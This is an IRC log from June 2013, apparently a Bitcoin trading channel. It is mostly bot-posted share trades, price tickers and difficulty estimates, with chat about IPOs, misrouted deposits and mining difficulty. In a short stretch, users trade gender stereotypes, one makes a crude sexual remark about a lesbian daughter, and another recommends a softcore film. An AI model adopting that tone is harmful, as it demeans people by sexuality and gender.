0.4236 BTC [-] Jun 01 00:45:30 [BTCTC] [ASICMINER-PT] 2 @ 2.5039 = 5.0078 BTC [+] Jun 01 00:49:03 [HAVELOCK] [ASICM] 2 @ 0.024899 = 0.0498 BTC [-] Jun 01 00:51:48 i tattled Jun 01 00:51:51 sryyyyyyy Jun 01 00:52:02 hahahahahaha Jun 01 00:52:18 btw theres nothing wrong with dutch auctions per se Jun 01 00:53:34 i guess in bitcoinia it looks "scammy", but its a legit way of running an IPO Jun 01 00:58:37 [BTCTC] [B.YABMC] 4 @ 0.01703 = 0.0681 BTC [-] Jun 01 00:58:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.024999 BTC [-] Jun 01 00:59:48 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1955 BTC [+] Jun 01 00:59:56 [BTCTC] [CRYPTO-TRADE] 3 @ 0.196 = 0.588 BTC [+] Jun 01 01:00:41 damn shame that crypto-trade IPO, up in flames is too generous a way to describe it Jun 01 01:07:17 Crypto-trade share price is holding up okay tho no? Jun 01 01:07:25 they just took way too long Jun 01 01:07:41 back when they IPO'd, the community wanted another exchange Jun 01 01:07:58 but in this time people really get used to BTC-e for altcoins Jun 01 01:08:03 its trading < IPO price Jun 01 01:08:15 they havent managed to sell all their shares Jun 01 01:08:28 well they were overpriced to start Jun 01 01:08:32 aside from that, there is basically no volume Jun 01 01:08:35 yeah Jun 01 01:08:39 (on the exchange itself) Jun 01 01:08:40 they now need to advertise Jun 01 01:08:44 and do outreach Jun 01 01:09:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.024999 = 0.1 BTC [-] Jun 01 01:10:55 [MPEX] [S.MPOE] 3698 @ 0.00071347 = 2.6384 BTC [+] Jun 01 01:10:56 [MPEX] [S.MPOE] 3791 @ 0.00071595 = 2.7142 BTC [+] Jun 01 01:18:33 [BTCTC] [TAT.ASICMINER] 6 @ 0.025 = 0.15 BTC [+] Jun 01 01:21:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] Jun 01 01:24:19 [BTCTC] [TAT.ASICMINER] 6 @ 0.025 = 0.15 BTC [+] Jun 01 01:25:29 [BTCTC] [TAT.ASICMINER] 15 @ 0.025 = 0.375 BTC [+] Jun 01 01:27:02 [BTCTC] [S.DICE-PT] 9 @ 0.002702 = 0.0243 BTC [-] Jun 01 01:28:15 [HAVELOCK] [ASICM] 18 @ 0.0249 = 0.4482 BTC [+] Jun 01 01:36:32 [MPEX] [S.MPOE] 12800 @ 0.00071678 = 9.1748 BTC [+] Jun 01 01:37:26 [BTCTC] [BASIC-MINING] 7 @ 0.67 = 4.69 BTC [+] Jun 01 01:38:17 [BTCTC] [TAT.ASICMINER] 12 @ 0.025 = 0.3 BTC [+] Jun 01 01:43:19 [HAVELOCK] [ASICM] 250 @ 0.02445001 = 6.1125 BTC [-] Jun 01 01:44:01 [BTCTC] [GSDPT] 50 @ 0.003 = 0.15 BTC [-] Jun 01 01:44:03 [BTCTC] [S.BBET-PT] 10 @ 0.0022 = 0.022 BTC [+] Jun 01 01:45:08 [HAVELOCK] [ASICM] 1 @ 0.0249 BTC [+] Jun 01 01:45:23 4avg Jun 01 01:45:26 $avg Jun 01 01:45:27 jurov: 127.90 Jun 01 01:49:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.025 = 0.25 BTC [+] Jun 01 01:51:41 [BTCTC] [TAT.ASICMINER] 6 @ 0.024999 = 0.15 BTC [-] Jun 01 01:52:23 and do outreach << i recvall there were some problems but not exactly what Jun 01 01:53:26 with crypto-trade? Jun 01 01:53:37 [BTCTC] [ASICMINER-PT] 4 @ 2.49 = 9.96 BTC [-] Jun 01 01:53:55 [BTCTC] [ASICMINER-PT] 1 @ 2.481 BTC [-] Jun 01 01:54:15 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [-] Jun 01 01:54:17 [BTCTC] [ASICMINER-PT] 4 @ 2.48 = 9.92 BTC [-] Jun 01 01:54:19 [BTCTC] [ASICMINER-PT] 2 @ 2.48 = 4.96 BTC [-] Jun 01 01:54:50 yea Jun 01 01:54:51 [BTCTC] [ASICMINER-PT] 1 @ 2.47999 BTC [-] Jun 01 01:55:13 [BTCTC] [ASICMINER-PT] 1 @ 2.4576 BTC [-] Jun 01 01:55:36 [BTCTC] [ASICMINER-PT] 5 @ 2.4575 = 12.2875 BTC [-] Jun 01 01:55:54 [HAVELOCK] [ASICM] 107 @ 0.0245 = 2.6215 BTC [-] Jun 01 01:55:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [+] Jun 01 01:55:59 [BTCTC] [ASICMINER-PT] 1 @ 2.456 BTC [-] Jun 01 01:56:21 [BTCTC] [ASICMINER-PT] 1 @ 2.45 BTC [-] Jun 01 01:56:33 [HAVELOCK] [ASICM] 266 @ 0.0245 = 6.517 BTC [-] Jun 01 01:56:41 [BTCTC] [ASICMINER-PT] 1 @ 2.4442 BTC [-] Jun 01 01:57:06 [BTCTC] [ASICMINER-PT] 1 @ 2.4441 BTC [-] Jun 01 01:57:33 [BTCTC] [ASICMINER-PT] 15 @ 2.444001 = 36.66 BTC [-] Jun 01 01:57:35 [BTCTC] [TAT.ASICMINER] 4 @ 0.025 = 0.1 BTC [+] Jun 01 01:57:36 [BTCTC] [ASICMINER-PT] 5 @ 2.444001 = 12.22 BTC [-] Jun 01 01:57:38 [BTCTC] [TAT.ASICMINER] 17 @ 0.024999 = 0.425 BTC [-] Jun 01 01:57:43 [BTCTC] [TAT.ASICMINER] 20 @ 0.024701 = 0.494 BTC [-] Jun 01 01:57:47 [BTCTC] [TAT.ASICMINER] 26 @ 0.0247 = 0.6422 BTC [-] Jun 01 01:57:59 [BTCTC] [TAT.ASICMINER] 36 @ 0.0247 = 0.8892 BTC [-] Jun 01 01:58:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.0247 = 0.0494 BTC [-] Jun 01 01:58:05 [BTCTC] [TAT.ASICMINER] 2 @ 0.024611 = 0.0492 BTC [-] Jun 01 01:58:06 [BTCTC] [TAT.ASICMINER] 90 @ 0.02461 = 2.2149 BTC [-] Jun 01 01:58:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.024605 BTC [-] Jun 01 01:58:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.024601 = 0.0738 BTC [-] Jun 01 01:58:23 [BTCTC] [TAT.ASICMINER] 10 @ 0.024601 = 0.246 BTC [-] Jun 01 01:59:40 [BTCTC] [GSDPT] 1 @ 0.003449 BTC [+] Jun 01 02:02:19 [HAVELOCK] [ASICM] 39 @ 0.02441 = 0.952 BTC [-] Jun 01 02:02:20 [HAVELOCK] [ASICM] 1 @ 0.02440003 BTC [-] Jun 01 02:02:21 [HAVELOCK] [ASICM] 10 @ 0.02440002 = 0.244 BTC [-] Jun 01 02:02:22 [HAVELOCK] [ASICM] 25 @ 0.0244 = 0.61 BTC [-] Jun 01 02:02:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.024588 BTC [-] Jun 01 02:03:07 [BTCTC] [TAT.ASICMINER] 7 @ 0.02456 = 0.1719 BTC [-] Jun 01 02:03:14 [BTCTC] [TAT.ASICMINER] 20 @ 0.02455 = 0.491 BTC [-] Jun 01 02:03:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.0245 = 0.049 BTC [-] Jun 01 02:03:34 [BTCTC] [TAT.ASICMINER] 2 @ 0.0245 = 0.049 BTC [-] Jun 01 02:03:43 [BTCTC] [TAT.ASICMINER] 36 @ 0.0245 = 0.882 BTC [-] Jun 01 02:03:47 [BTCTC] [TAT.ASICMINER] 4 @ 0.024422 = 0.0977 BTC [-] Jun 01 02:03:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.0244 = 0.0488 BTC [-] Jun 01 02:05:52 [MPEX] [S.MPOE] 1737 @ 0.00071678 = 1.245 BTC [+] Jun 01 02:10:55 [BTCTC] [BITVPS] 98 @ 0.000719 = 0.0705 BTC [+] Jun 01 02:11:26 [MPEX] [S.MPOE] 6578 @ 0.00072042 = 4.7389 BTC [+] Jun 01 02:11:28 [MPEX] [S.MPOE] 5622 @ 0.00072077 = 4.0522 BTC [+] Jun 01 02:15:34 [BTCTC] [S.BBET-PT] 43 @ 0.0022 = 0.0946 BTC [+] Jun 01 02:17:09 [BTCTC] [S.BBET-PT] 1 @ 0.0022 BTC [+] Jun 01 02:20:10 [MPEX] [S.MPOE] 7341 @ 0.00072077 = 5.2912 BTC [+] Jun 01 02:20:13 [MPEX] [S.MPOE] 10709 @ 0.00072123 = 7.7237 BTC [+] Jun 01 02:21:26 [BTCTC] [TAT.ASICMINER] 9 @ 0.024949 = 0.2245 BTC [+] Jun 01 02:25:11 [BTCTC] [TAT.ASICMINER] 11 @ 0.024949 = 0.2744 BTC [+] Jun 01 02:25:14 [BTCTC] [TAT.ASICMINER] 28 @ 0.024949 = 0.6986 BTC [+] Jun 01 02:28:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.024949 BTC [+] Jun 01 02:29:41 [BTCTC] [ASICMINER-PT] 1 @ 2.445001 BTC [+] Jun 01 02:29:43 [BTCTC] [ASICMINER-PT] 4 @ 2.445 = 9.78 BTC [-] Jun 01 02:29:44 [BTCTC] [ASICMINER-PT] 1 @ 2.4431 BTC [-] Jun 01 02:29:46 [BTCTC] [ASICMINER-PT] 2 @ 2.443 = 4.886 BTC [-] Jun 01 02:29:47 [BTCTC] [ASICMINER-PT] 1 @ 2.442 BTC [-] Jun 01 02:29:50 [BTCTC] [ASICMINER-PT] 4 @ 2.44 = 9.76 BTC [-] Jun 01 02:38:44 [MPEX] [S.MPOE] 3663 @ 0.00072041 = 2.6389 BTC [-] Jun 01 02:42:45 [BTCTC] [BASIC-MINING] 1 @ 0.669 BTC [-] Jun 01 02:43:25 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1979 BTC [+] Jun 01 02:44:04 [BTCTC] [BTC-BOND] 6 @ 0.01 = 0.06 BTC [+] Jun 01 02:46:03 [BTCTC] [COGNITIVE] 9 @ 0.339 = 3.051 BTC [-] Jun 01 02:56:22 $avg Jun 01 02:56:23 jurov: 127.94 Jun 01 02:56:55 https://sphotos-b.xx.fbcdn.net/hphotos-prn1/933957_10152856070305427_1972144763_n.jpg Jun 01 03:00:21 $avg Jun 01 03:00:22 jurov: 127.95 Jun 01 03:01:04 arrrgh... i *hope* mpex used this one Jun 01 03:03:07 ;;ticker Jun 01 03:03:08 BTCUSD ticker | Best bid: 128.85701, Best ask: 129.77998, Bid-ask spread: 0.92297, Last trade: 128.85103, 24 hour volume: 16455.58206870, 24 hour low: 126.33000, 24 hour high: 130.00000, 24 hour vwap: 128.14923 Jun 01 03:09:55 [BTCTC] [TAT.ASICMINER] 8 @ 0.024948 = 0.1996 BTC [-] Jun 01 03:12:24 [BTCTC] [BASIC-MINING] 5 @ 0.669 = 3.345 BTC [-] Jun 01 03:23:30 [BTCTC] [ASICMINER-PT] 7 @ 2.4409 = 17.0863 BTC [+] Jun 01 03:26:51 [BTCTC] [ASICMINER-PT] 5 @ 2.44 = 12.2 BTC [-] Jun 01 03:27:26 [HAVELOCK] [ASICM] 4 @ 0.0247999 = 0.0992 BTC [+] Jun 01 03:30:25 [HAVELOCK] [ASICM] 100 @ 0.0247999 = 2.48 BTC [+] Jun 01 03:32:49 [BTCTC] [BASIC-MINING] 25 @ 0.67 = 16.75 BTC [+] Jun 01 03:36:21 [BTCTC] [BASIC-MINING] 10 @ 0.67 = 6.7 BTC [+] Jun 01 03:42:42 [BTCTC] [ASICMINER-PT] 1 @ 2.49 BTC [+] Jun 01 03:43:14 okay i'm dead tired, going off. Jun 01 03:44:04 if i made mess from the opex, rogue withdrawal requests are welcome :D Jun 01 03:44:51 (and email complaints even more) Jun 01 03:48:13 [BTCTC] [ASICMINER-PT] 3 @ 2.445 = 7.335 BTC [-] Jun 01 03:48:57 [BTCTC] [S.DICE-PT] 36 @ 0.002702 = 0.0973 BTC [-] Jun 01 03:49:56 [BTCTC] [BASIC-MINING] 2 @ 0.67 = 1.34 BTC [+] Jun 01 03:49:57 [BTCTC] [BASIC-MINING] 12 @ 0.68 = 8.16 BTC [+] Jun 01 03:56:47 [HAVELOCK] [ASICM] 2 @ 0.0246 = 0.0492 BTC [-] Jun 01 03:56:53 [MPEX] [S.MPOE] 5100 @ 0.00071614 = 3.6523 BTC [-] Jun 01 03:58:43 [BTCTC] [BTC-BOND] 27 @ 0.01 = 0.27 BTC [+] Jun 01 03:59:33 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [+] Jun 01 04:00:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.0247 BTC [-] Jun 01 04:00:43 http://trilema.com/2013/mpoe-may-2013-statement/ Jun 01 04:01:13 21st month of mpoe, 14th month of mpex. Jun 01 04:03:33 Revenue from misrouted deposits : 200 BTC Jun 01 04:03:34 jeez. Jun 01 04:04:43 [MPEX] [S.MPOE] 21081 @ 0.00071614 = 15.0969 BTC [-] Jun 01 04:04:54 [BTCTC] [TAT.ASICMINER] 8 @ 0.0246 = 0.1968 BTC [-] Jun 01 04:04:56 [BTCTC] [TAT.ASICMINER] 6 @ 0.0246 = 0.1476 BTC [-] Jun 01 04:06:09 [BTCTC] [PAJKA.BOND] 3 @ 0.11 = 0.33 BTC [+] Jun 01 04:07:12 myeah. Jun 01 04:08:04 [BTCTC] [RSM] 1 @ 0.00704 BTC [+] Jun 01 04:08:05 [BTCTC] [RSM] 2 @ 0.00703 = 0.0141 BTC [-] Jun 01 04:09:07 [BTCTC] [RSM] 75 @ 0.00701 = 0.5258 BTC [-] Jun 01 04:09:08 [BTCTC] [RSM] 25 @ 0.00701 = 0.1753 BTC [-] Jun 01 04:11:16 [BTCTC] [TAT.ASICMINER] 9 @ 0.024948 = 0.2245 BTC [+] Jun 01 04:11:57 [HAVELOCK] [SDICE] 2 @ 0.19 = 0.38 BTC [+] Jun 01 04:13:46 [BTCTC] [TAT.ASICMINER] 7 @ 0.024949 = 0.1746 BTC [+] Jun 01 04:14:16 [HAVELOCK] [ASICM] 4 @ 0.0247999 = 0.0992 BTC [+] Jun 01 04:15:16 [HAVELOCK] [ASICM] 98 @ 0.0246 = 2.4108 BTC [-] Jun 01 04:15:27 [MPEX] [S.MPOE] 12630 @ 0.00071614 = 9.0448 BTC [-] Jun 01 04:15:29 [MPEX] [S.MPOE] 2020 @ 0.00071578 = 1.4459 BTC [-] Jun 01 04:17:03 [BTCTC] [TAT.ASICMINER] 12 @ 0.02495 = 0.2994 BTC [+] Jun 01 04:17:36 [BTCTC] [BTC-BOND] 8 @ 0.01 = 0.08 BTC [+] Jun 01 04:19:21 mircea_popescu: not bad :) Jun 01 04:19:21 [BTCTC] [RSM] 19 @ 0.00701 = 0.1332 BTC [-] Jun 01 04:19:32 [BTCTC] [RSM] 5 @ 0.00701 = 0.0351 BTC [-] Jun 01 04:19:33 I made a juicy third of a bitcoin out of that Jun 01 04:19:34 [BTCTC] [RSM] 106 @ 0.007 = 0.742 BTC [-] Jun 01 04:19:37 almost as much as you made! Jun 01 04:19:51 haha good for you! Jun 01 04:20:09 yeah I'm pretty awesome Jun 01 04:20:19 actually... these days a third of a btc is pretty serious dough huh Jun 01 04:20:31 more than it used to be, certainly :) Jun 01 04:20:34 close to $50 Jun 01 04:20:46 more like $40 actually Jun 01 04:20:51 but still, not too shabby for not doing anything Jun 01 04:20:59 like... numerous pizzas. Jun 01 04:21:04 except the risk of forgetting how the hell to talk to mpex :P Jun 01 04:21:24 lol i'm sure you'll jailbreak yourself. Jun 01 04:21:49 [BTCTC] [CRYPTO-TRADE] 9 @ 0.1979 = 1.7811 BTC [+] Jun 01 04:23:22 [BTCTC] [CRYPTO-TRADE] 5 @ 0.198 = 0.99 BTC [+] Jun 01 04:27:28 [BTCTC] [CRYPTO-TRADE] 65 @ 0.19998 = 12.9987 BTC [+] Jun 01 04:28:10 ;;ticker Jun 01 04:28:11 BTCUSD ticker | Best bid: 128.57536, Best ask: 128.59000, Bid-ask spread: 0.01464, Last trade: 128.59999, 24 hour volume: 15692.08216785, 24 hour low: 126.33000, 24 hour high: 130.00000, 24 hour vwap: 128.17545 Jun 01 04:38:02 mircea_popescu: I had a question for you from a dream I just had. Jun 01 04:38:12 I almost forgot it but now I remember. Jun 01 04:38:18 the plot thickens... Jun 01 04:38:24 !last m s.mpoe Jun 01 04:38:25 Last trade for S.MPOE on MPEX was at 0.00071578 BTC [-] Jun 01 04:38:48 It was on the issue of gender revocation, or societies denial of gender "skills". Jun 01 04:39:07 Due to the growing feminist movements, gender equality, blah blah Jun 01 04:39:34 I had a dream where some guy had a lesbian daughter, and you said something along the lines of "she is more likely to acquire male like skills" Jun 01 04:39:51 such as fixing a car or mechanical skills Jun 01 04:40:23 the dream is fading but that was the gist of it Jun 01 04:40:28 lolk... Jun 01 04:42:14 i have weird dreams Jun 01 04:44:32 next time you bother dreaming me, Jun 01 04:44:39 have me fuck the lez daughter and her gf. Jun 01 04:45:15 i think that dream you are a lesbian and are in love with mircea_popescu ? Jun 01 04:45:34 i am not freud though Jun 01 04:45:48 http://trilema.com/2013/google-numerology/ Jun 01 04:45:53 here's a littl;e bit of whoa. Jun 01 04:50:43 Good, I'll pay the MPOE dividend right away Jun 01 04:50:53 I better make a spreadsheet for the div payments... Jun 01 04:51:23 "talking to a bunch of beached whales stuck on the computer" Jun 01 04:51:28 roflmfao Jun 01 04:52:31 truth! Jun 01 04:53:07 [BTCTC] [RSM] 9 @ 0.007 = 0.063 BTC [-] Jun 01 04:54:19 [BTCTC] [TAT.ASICMINER] 2 @ 0.02495 = 0.0499 BTC [+] Jun 01 04:56:30 [BTCTC] [GSDPT] 1 @ 0.00299 BTC [-] Jun 01 04:56:42 [BTCTC] [TAT.ASICMINER] 6 @ 0.02495 = 0.1497 BTC [+] Jun 01 04:57:02 [MPEX] [S.MPOE] 9300 @ 0.00071634 = 6.662 BTC [+] Jun 01 04:57:27 [BTCTC] [ASICMINER-PT] 1 @ 2.473999 BTC [+] Jun 01 04:58:08 [HAVELOCK] [ASICM] 100 @ 0.0245 = 2.45 BTC [-] Jun 01 04:58:21 [HAVELOCK] [ASICM] 62 @ 0.02441 = 1.5134 BTC [-] Jun 01 04:59:13 [MPEX] [S.MPOE] 8000 @ 0.00071578 = 5.7262 BTC [-] Jun 01 05:02:30 o hey, looks who's here! Jun 01 05:02:37 how;s the junior smickles ? Jun 01 05:05:19 [BTCTC] [ASICMINER-PT] 3 @ 2.474 = 7.422 BTC [+] Jun 01 05:08:19 [BTCTC] [BTC-BOND] 8 @ 0.01 = 0.08 BTC [+] Jun 01 05:12:00 [BTCTC] [ASICMINER-PT] 1 @ 2.4999 BTC [+] Jun 01 05:12:40 [HAVELOCK] [ASICM] 15 @ 0.02441 = 0.3662 BTC [-] Jun 01 05:19:51 [BTCTC] [BITVPS] 16 @ 0.00072 = 0.0115 BTC [+] Jun 01 05:20:05 [HAVELOCK] [ASICM] 4 @ 0.0247 = 0.0988 BTC [+] Jun 01 05:21:53 [BTCTC] [TAT.ASICMINER] 5 @ 0.02495 = 0.1248 BTC [+] Jun 01 05:22:08 [HAVELOCK] [ASICM] 4 @ 0.0247 = 0.0988 BTC [+] Jun 01 05:26:32 [BTCTC] [TAT.ASICMINER] 3 @ 0.02495 = 0.0749 BTC [+] Jun 01 05:29:57 [BTCTC] [TAT.ASICMINER] 2 @ 0.02495 = 0.0499 BTC [+] Jun 01 05:46:01 If you like lesbians check out The Seduction of Misty Mundae Jun 01 05:46:17 its not all action and has a good story to it Jun 01 05:46:33 A good one to watch with your girlfriend or something Jun 01 05:46:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.02495 = 0.0749 BTC [+] Jun 01 05:47:16 [BTCTC] [PAJKA.BOND] 1 @ 0.11 BTC [+] Jun 01 05:48:18 [BTCTC] [BITVPS] 9 @ 0.00072 = 0.0065 BTC [+] Jun 01 05:50:29 [BTCTC] [PAJKA.BOND] 50 @ 0.11 = 5.5 BTC [+] Jun 01 05:54:45 [HAVELOCK] [ASICM] 80 @ 0.0245 = 1.96 BTC [-] Jun 01 05:57:01 [HAVELOCK] [ASICM] 1 @ 0.02445 BTC [-] Jun 01 06:15:57 ;;nethash Jun 01 06:15:58 109352.079289 Jun 01 06:16:45 ;;bc,stats Jun 01 06:16:46 Current Blocks: 238978 | Current Difficulty: 1.2153411709775832E7 | Next Difficulty At Block: 239903 | Next Difficulty In: 925 blocks | Next Difficulty In About: 5 days, 5 hours, 25 minutes, and 25 seconds | Next Difficulty Estimate: 14325665.8053 | Estimated Percent Change: 17.87362 Jun 01 06:17:37 ;;estimate Jun 01 06:17:38 Next difficulty estimate | 14300697.8118 based on data since last change | 15276075.9055 based on data for last three days Jun 01 06:29:45 14 ?! whoa. Jun 01 06:30:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.0248 = 0.0744 BTC [-] Jun 01 06:30:23 [BTCTC] [TAT.ASICMINER] 29 @ 0.0247 = 0.7163 BTC [-] Jun 01 06:30:26 [BTCTC] [TAT.ASICMINER] 29 @ 0.02466 = 0.7151 BTC [-] Jun 01 06:30:49 [HAVELOCK] [ASICM] 39 @ 0.0246 = 0.9594 BTC [+] Jun 01 06:31:13 yep Jun 01 06:31:18 pretty big jump Jun 01 06:31:27 What the... gah Jun 01 06:32:01 Where's burnside... Jun 01 06:32:28 ThickAsThieves back in march during the prev xdiff fixing it came to ~3mn Jun 01 06:32:37 now it's looking like 15mn, more than 5x. Jun 01 06:32:41 I can't manage to retrieve some JSON data correctly Jun 01 06:32:47 if insanity had a name, this'd be it. 500x diff in 3 months. Jun 01 06:33:03 i mean 500% Jun 01 06:34:51 my diff futures with jurov might actually pay off Jun 01 06:36:24 [HAVELOCK] [ASICM] 3 @ 0.0248 = 0.0744 BTC [+] Jun 01 06:37:30 [BTCTC] [PAJKA.BOND] 17 @ 0.1099 = 1.8683 BTC [-] Jun 01 06:38:28 [BTCTC] [PAJKA.BOND] 23 @ 0.11 = 2.53 BTC [+] Jun 01 06:40:23 [BTCTC] [COGNITIVE] 1 @ 0.325102 BTC [-] Jun 01 06:41:04 [BTCTC] [COGNITIVE] 2 @ 0.339 = 0.678 BTC [+] Jun 01 06:41:50 [BTCTC] [BITVPS] 15 @ 0.000647 = 0.0097 BTC [-] Jun 01 06:42:07 [BTCTC] [BITVPS] 10 @ 0.000646 = 0.0065 BTC [-] Jun 01 06:42:18 mircea_popescu: just curious, did the person(s) that mis-deposited those funds ask for their money back? Jun 01 06:42:23 [BTCTC] [BITVPS] 50 @ 0.000645 = 0.0323 BTC [-] Jun 01 06:42:25 [BTCTC] [BITVPS] 50 @ 0.000645 = 0.0323 BTC [-] Jun 01 06:42:39 [BTCTC] [BITVPS] 10 @ 0.000632 = 0.0063 BTC [-] Jun 01 06:42:55 [BTCTC] [BITVPS] 208 @ 0.000631 = 0.1312 BTC [-] Jun 01 06:43:27 would you? Jun 01 06:43:51 I wouldn't make that mistake. Hopefully... Jun 01 06:44:26 [BTCTC] [S.DICE-PT] 16 @ 0.002421 = 0.0387 BTC [-] Jun 01 06:44:27 surely they asked Jun 01 06:44:57 [BTCTC] [S.MPOE-PT] 175 @ 0.000664 = 0.1162 BTC [-] Jun 01 06:45:03 I'd ask, 200 BTC isn't cheap these days Jun 01 06:47:07 200btc isn't even the worst of them all. compare and contrast http://www.nbcnews.com/id/10394551/ns/business-world_business/t/botched-stock-trade-costs-japan-firm-m/ Jun 01 06:47:30 heh Jun 01 06:48:37 I wonder how long those beige keyboards in that picture have been sitting there Jun 01 06:49:56 well the article itself is from 2005 Jun 01 06:51:02 ah, didn't catch that right away Jun 01 06:52:06 it's kind of a famous event Jun 01 06:52:46 there was acqually an equivalent on mpex, an s.dice order was placed for no apparent minimum last year, about 1mn shares changed hands. at the time this was ~3k btc or so worth. Jun 01 07:01:41 jurov Jun 01 07:01:45 ;;nethash Jun 01 07:01:45 109247.182556 Jun 01 07:01:50 ;;estimate Jun 01 07:01:51 Next difficulty estimate | 14340987.7727 based on data since last change | 15261422.2247 based on data for last three days Jun 01 07:02:46 might wanna raise your DiffOdd asks Jun 01 07:04:13 [HAVELOCK] [ASICM] 1 @ 0.0248 BTC [+] Jun 01 07:04:40 [HAVELOCK] [ASICM] 1 @ 0.0246 BTC [-] Jun 01 07:06:41 [BTCTC] [S.MPOE-PT] 1 @ 0.000708 BTC [+] Jun 01 07:07:29 [BTCTC] [PAJKA.BOND] 1 @ 0.1095 BTC [-] Jun 01 07:10:12 [BTCTC] [ESECURITYSABTC] 1 @ 0.317479 BTC [-] Jun 01 07:21:20 mircea_popescu , process withdraw when you get a chance. thanks Jun 01 07:22:37 [BTCTC] [LTC-MINING] 3 @ 0.447 = 1.341 BTC [-] Jun 01 07:25:27 [BTCTC] [S.DICE-PT] 1 @ 0.002735 BTC [+] Jun 01 07:30:47 [HAVELOCK] [ASICM] 121 @ 0.0246 = 2.9766 BTC [-] Jun 01 07:32:55 [BTCTC] [ASICMINER-PT] 2 @ 2.5 = 5 BTC [+] Jun 01 07:33:26 [MPEX] [S.MPOE] 8648 @ 0.00071484 = 6.1819 BTC [-] Jun 01 07:33:28 [MPEX] [S.MPOE] 4852 @ 0.00071399 = 3.4643 BTC [-] Jun 01 07:45:54 on gox, looks like a bunch of orders totalling $1,135,545 at $127 Jun 01 07:45:59 [BTCTC] [ESECURITYSABTC] 1 @ 0.3129 BTC [-] Jun 01 07:46:03 [BTCTC] [ESECURITYSABTC] 1 @ 0.301 BTC [-] Jun 01 07:49:09 ;;bids 127 Jun 01 07:49:09 There are currently 8935.6604 bitcoins demanded at or over 127.0 USD, worth 1135120.6337 USD in total. | Data vintage: 57.7710 seconds Jun 01 07:49:49 [BTCTC] [BTC-BOND] 492 @ 0.01 = 4.92 BTC [+] Jun 01 07:52:02 [BTCTC] [BTC-BOND] 6 @ 0.01 = 0.06 BTC [+] Jun 01 08:17:51 [BTCTC] [S.DICE-PT] 4 @ 0.002421 = 0.0097 BTC [-] Jun 01 08:17:52 [BTCTC] [S.DICE-PT] 12 @ 0.002421 = 0.0291 BTC [-] Jun 01 08:17:54 [BTCTC] [S.DICE-PT] 2 @ 0.002421 = 0.0048 BTC [-] Jun 01 08:17:56 [BTCTC] [ASICMINER-PT] 1 @ 2.465001 BTC [-] Jun 01 08:18:19 [BTCTC] [S.DICE-PT] 1 @ 0.00242 BTC [-] Jun 01 08:19:11 [BTCTC] [ASICMINER-PT] 4 @ 2.465 = 9.86 BTC [-] Jun 01 08:20:09 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [+] Jun 01 08:21:06 jborkl_ i'm going to do payouts tomorrow for the whole array. Jun 01 08:21:23 [BTCTC] [BASIC-MINING] 8 @ 0.68 = 5.44 BTC [+] **** BEGIN LOGGING AT Sat Jun 1 16:03:53 2013 Jun 01 16:08:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 01 16:11:07 jurov http://www.utalkmarketing.com/pages/Article.aspx?ArticleID=14741 Jun 01 16:14:21 [BTCTC] [ASICMINER-PT] 1 @ 2.47001 BTC [+] Jun 01 16:14:23 [BTCTC] [ASICMINER-PT] 1 @ 2.47 BTC [-] Jun 01 16:14:25 [BTCTC] [ASICMINER-PT] 4 @ 2.47 = 9.88 BTC [-] Jun 01 16:17:27 [BTCTC] [ASICMINER-PT] 1 @ 2.48 BTC [+] Jun 01 16:19:55 [BTCTC] [BASIC-MINING] 2 @ 0.68 = 1.36 BTC [+] Jun 01 16:20:15 [HAVELOCK] [ASICM] 2 @ 0.02489 = 0.0498 BTC [+] Jun 01 16:22:07 [BTCTC] [S.DICE-PT] 20 @ 0.002724 = 0.0545 BTC [-] Jun 01 16:22:17 [BTCTC] [TAT.ASICMINER] 6 @ 0.0249 = 0.1494 BTC [+] Jun 01 16:22:45 [BTCTC] [GSDPT] 4 @ 0.002702 = 0.0108 BTC [-] Jun 01 16:22:47 [BTCTC] [GSDPT] 4 @ 0.002691 = 0.0108 BTC [-] Jun 01 16:22:47 [BTCTC] [GSDPT] 4 @ 0.002691 = 0.0108 BTC [-] Jun 01 16:22:49 [BTCTC] [GSDPT] 11 @ 0.00258 = 0.0284 BTC [-] Jun 01 16:22:50 [BTCTC] [GSDPT] 141 @ 0.002575 = 0.3631 BTC [-] Jun 01 16:22:52 [BTCTC] [GSDPT] 50 @ 0.002571 = 0.1286 BTC [-] Jun 01 16:22:57 [BTCTC] [GSDPT] 86 @ 0.00255 = 0.2193 BTC [-] Jun 01 16:24:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.0249 = 0.0996 BTC [+] Jun 01 16:24:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.0249 BTC [+] Jun 01 16:25:23 [BTCTC] [B.YABMC] 10 @ 0.0177 = 0.177 BTC [+] Jun 01 16:25:48 [BTCTC] [B.YABMC] 8 @ 0.0177 = 0.1416 BTC [+] Jun 01 16:26:32 [BTCTC] [B.YABMC] 15 @ 0.017758 = 0.2664 BTC [+] Jun 01 16:26:33 [BTCTC] [B.YABMC] 7 @ 0.017759 = 0.1243 BTC [+] Jun 01 16:29:25 [BTCTC] [S.DICE-PT] 10 @ 0.002724 = 0.0272 BTC [-] Jun 01 16:29:45 wtf is dis http://btclag.org/ Jun 01 16:29:56 btc lag. Jun 01 16:30:02 smells like gox. Jun 01 16:30:28 [BTCTC] [S.DICE-PT] 150 @ 0.002724 = 0.4086 BTC [-] Jun 01 16:32:28 [HAVELOCK] [HIM] 16 @ 2.6897 = 43.0352 BTC [+] Jun 01 16:32:41 [HAVELOCK] [HIM] 6 @ 2.6898 = 16.1388 BTC [+] Jun 01 16:32:51 [HAVELOCK] [HIM] 1 @ 